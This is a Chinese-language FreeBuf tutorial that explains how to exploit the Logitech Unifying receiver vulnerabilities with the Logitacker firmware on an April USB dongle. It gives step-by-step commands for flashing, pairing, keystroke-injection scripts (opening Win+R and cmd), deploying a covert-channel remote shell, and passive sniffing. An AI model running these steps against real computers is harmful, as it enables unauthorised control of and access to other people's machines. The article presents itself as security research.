声明:仅用于测试研究勿用于非法用途
前言:
(1)在2019年有研究人员发现了罗技的四个漏洞,分别是CVE-2019-13054 CVE-2019-13055 CVE-2019013052 CVE-2019-13053前两个漏洞官方修复了但是后两个漏洞将保持持续开放状态。
(2)badusb相信有不少人有所了解,例如HAK5的大黄鸭,用arduino pro micro开发板diy,还有用digispark制作。之前的这几种badusb都是提前在板子里烧录好所需的代码然后插到目标电脑上执行固定的指令,这有一定的局限性。还有一类badusb是利用wifi(esp8266)来发送指令,做到了随时使用这一点。最后就是隐蔽性高伪装成数据线的一种O.MG数据线和国内硬件爱好者制作的hackusb。利用蓝牙来输入payload。
今天要制作的是利用罗技漏洞的一种蓝牙badusb,用到的项目是Logitacker,之所以说它特别,是因为有一些特别的功能。
一、需要的设备与程序
所需的设备
(1)一个年份比较老的罗技的接收器,一定要是Unifying的,我用的是C-U0007
(2)一个发射信号的设备,发现这个漏洞研究者用的是CyazyRadio,配置麻烦,所以在这里用到的是April usb Dongle在某宝有售便宜【滑稽】
所需的程序
(1)PUTTY(用于连接发射器)
(2)Logitech unifying软件
二、硬件所需要的配置
(1)April usb Dongle
首先须要在April usb Dongle放入所需的程序。项目地址下载后打开build/logitacker-aprdongle.uf2这就是所需要的程序。
april usb dongle上面有一个小孔,孔内有一个按钮,找一个细一点的东西通过孔按下按钮,边按边插在电脑的接口上,这时电脑会显示有一个可移动磁盘,我们只需要将刚刚下载好的程序用鼠标拖入磁盘就行了。
三、用Putty连接april usb dongle
首先将dongle重新插在电脑上打开设备管理,查看端口,将端口波特率改为115200
然后打开PUTTY设置一下连接端口,如下
然后就完成了
下面将发射器与接收器配对方法与罗技正常键鼠的方法差不多,首先要有Logitech unifying软件,
将罗技接收器插在电脑上然后按照软件一步一步走就行,同时在PUTTY输入下面这段,让发射器发出匹配信号,同时在Logitech unifying软件上将会显示扫描到一个名为Logitacker的设备
pair device run //开始配对
配对成功,同时记下MAC地址,执行下面的命令
devices storage save MAC地址 //将地址保存在arm里方便下次使用
四、使用
第一步当然是将MAC地址从arm里拿出来了!
devices storage load 然后按tap键自动补全mac
准备mac
inject target tap补全
做完以上这些,就可以开始写脚本了,简单说明一下
script delay 1000 //设置延迟
script press GUI R //同时按GUR键和R键
script string cmd //输入内容cmd
script show //显示刚刚输入的内容
执行脚本
inject execute
当然也可以将脚本保存在ARM里
script store 脚本名
script list //查看所储存的脚本列表
script load 脚本名 //将脚本提取出来
script remove 脚本名 //将脚本从储存列表删除
script clear //清除刚刚写的或提取的脚本
五、更多功能
获得shell
covert_channel deploy MAC地址
covert_channel connect //连接shell
监听模式
options passive-enum pass-through-mouse on
options passive-enum pass-through-keyboard on
六、可能出现的问题
在PUTTY使用时输入的内容删除不了。
办法:在PUTTY的keyboard设置里将默认的control-?改为control-H
*本文作者:piptsmile,转载请注明来自FreeBuf.COM
来源:freebuf.com 2020-06-05 08:00:02 by: piptsmile
请登录后发表评论
注册